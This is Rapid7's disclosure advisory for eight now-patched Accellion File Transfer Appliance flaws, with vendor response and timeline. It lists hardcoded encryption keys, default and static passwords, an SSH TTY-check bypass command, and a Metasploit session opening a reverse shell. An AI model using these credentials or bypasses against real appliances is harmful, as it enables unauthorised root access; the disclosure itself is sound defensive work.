Back to Advisories

Advisories

Rapid7 Advisory R7-0039: Accellion File Transfer Appliance Multiple Vulnerabilities

Description:

The Accellion File Transfer Appliance, prior to version FTA_8_0_562, suffers from a number of security flaws that can lead to a remote root compromise.

1. Message Routing Daemon Default Encryption Keys

The appliance ships with UDP port 8812 allowed through the firewall. The port correlates to an internal service that routes messages between backend processes. To authenticate access to this service, all messages must be encrypted with a secret key using the blowfish algorithm. The appliance ships with two default keys, neither of which is random, which results in an attacker being able to communicate with the internal processes of the appliance and perform administration tasks on the appliance itself. These two default keys are 123456789ABCDEF0123456789ABCDEF0 and 0123456789ABCDEF0123456789ABCDEF, which are expanded with MD5 to create 448-bit blowfish keys.

2. MatchRep Daemon insert_plugin_meta_info() Command Injection

One of the applications that is exposed through the port 8812 message routing service executes a system command without sanitizing the arguments provided by the requesting application. This allows arbitrary commands to be executed on the appliance. Combined with Issue #1, this allows remote, unauthenticated command execution on the appliance as the "soggycat" user, which is root equivalent (sudo rights). Rapid7 has developed a Metasploit module[***] to chain these vulnerabilities and will release this module in early March.

3. Remote Administration TTY Check Bypass

The appliance ships with a default login of admin/accellion. To reduce the risk of remote attack, this account is not allowed to login over Secure Shell. The implementation of this security check has a flaw and it is still possible to configure an out-of-box Accellion appliance remotely through SSH, simply by executing a shell without a TTY: (ssh admin@target 'sh')

4. Static Passwords for Privileged User Accounts

The secure shell daemon is running by default and the system is configured with static passwords for a number of root-equivalent accounts. It is possible to crack these passwords and gain access to any Accellion system with the secure shell daemon exposed. The scope of our research did not provide time to crack these passwords, but it’s a just a question of resource allocation. These accounts include "soggycat","sdadmin", and the "root" user account itself.

5. Remote Access via Stale SSH Authorized Keys

The "soggycat" user account has a static password, as mentioned previously, but also has two SSH keys configured for passwordless login. These keys were generated over eight years ago and should have been changed to reduce the risk of exposure. The comments of these two keys are worrying as well:

[root@fta soggycat]# grep -i comment .ssh2/*.pub
.ssh2/theone.pub:Comment: "i am going to kiiiiiiiiiiiiill you"
.ssh2/thetwo.pub:Comment: "1024-bit dsa, kelvin@admin.c1s1.net, Mon Feb
25 2002 05:31:0

6. Weak MySQL Password for "root" Account

This issue is not exploitable by default due to firewall configuration of the appliance, but it points to larger problems with the design of the system. The root password for the MySQL server is simply "hawksql" and all users of the system are able to read this password within various configuration files. At the least, a non-root MySQL user account should be used to reduce the risk of attack due to SQL  Injection flaws in the rest of the application.

7. Internal Daemons not Bound to Loopback Interface

This issue is not exploitable by default due to firewall configuration of the appliance. All internal services communicate through UDP services bound to the 0.0.0.0 address. This exposes the internal workings of the appliance to an attacker with network access to the system. For example, a local user account without administrative rights would still be able to escalate privileges by communicating with these internal services.

8. Rsync Daemon Allows Access to Privileged User Home Directory

This issue is not exploitable by default due to firewall configuration of the appliance. The rsync daemon allows read/write access to the "soggycat" home directory. Since this user account is root-equivalent, any attacker than talk to the rsync daemon can take full control of the appliance.

*** Information from the Metasploit module combining issues #1 and #2, to be released in early March of 2011.

Description:

This module exploits a chain of vulnerabilities in the Accellion File Transfer appliance. This appliance exposes a UDP service on port 8812 that acts as a gateway to the internal communication bus. This service uses Blowfish encryption for authentication, but the
appliance ships with two easy to guess default authentication keys. This module abuses the known default encryption keys to inject a message into the communication bus. In order to execute arbitrary commands on the remote appliance, a message is injected into the bus
destined for the 'matchrep' service. This service exposes a function named 'insert_plugin_meta_info' which is vulnerable to an input validation flaw in a call to system(). This provides access to the 'soggycat' user account, which has sudo privileges to run the
primary admin tool as root.

msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151
msf exploit(accellion_fta_mpipe2) > exploit

[*] Started reverse handler on 192.168.198.135:4444
[*] Command shell session 1 opened (192.168.198.135:4444 ->
192.168.198.151:42239) at 2010-11-15 23:50:35 -0600

id uid=520(soggycat) gid=99(nobody) groups=99(nobody)

Vendor Response:

Accellion addressed item #3 on December 21st, 2010 with update FTA_8_0_540

Accellion addressed items #1, #2, #4, #5, #6, and #7 on January 17th, 2011 with update FTA_8_0_562

Item #8 is not exploitable in the default configuration and Accellion recommends the use of SSL VPN when configuring a trusted link between two appliances.

Official Changelog for FTA_8_0_562:

The update randomizes the following on the Accellion setup - Accellion remote management user password, the system mysql password and the keys used for encrypting inter-appliance communication. All internal Daemons are now bound to Loopback Interface. The update also removes an unused SSH key meant for remote troubleshooting login. These fixes are in response to a security scan done by Rapid7.

Disclosure Timeline:
2010-10-21 - Issue #3 was reported to Accellion
2010-12-06 - Issues #1, #2, #4, #5, #6, #7, #8 reported to Accellion
2010-12-20 - A reminder of Rapid7 policy was sent to Accellion
2010-12-21 - Accellion responds with a fix date of January 2011
2010-12-21 - Accellion releases FTA_8_0_540 to address #3
2011-01-17 - Accellion releases FTA_8_0_562 to address remaining items
2011-02-07 - Detailed advisory released by Rapid7

Credit:
This vulnerability was discovered by HD Moore

About Rapid7 Security
Rapid7 provides vulnerability management, compliance and penetration testing solutions for Web application, network and database security. In addition to developing the Nexpose Vulnerability Management system, Rapid7 manages the Metasploit Project and is the primary sponsor of the W3AF web assessment tool.

Our vulnerability disclosure policy is available online at:

https://www.rapid7.com/disclosure.jsp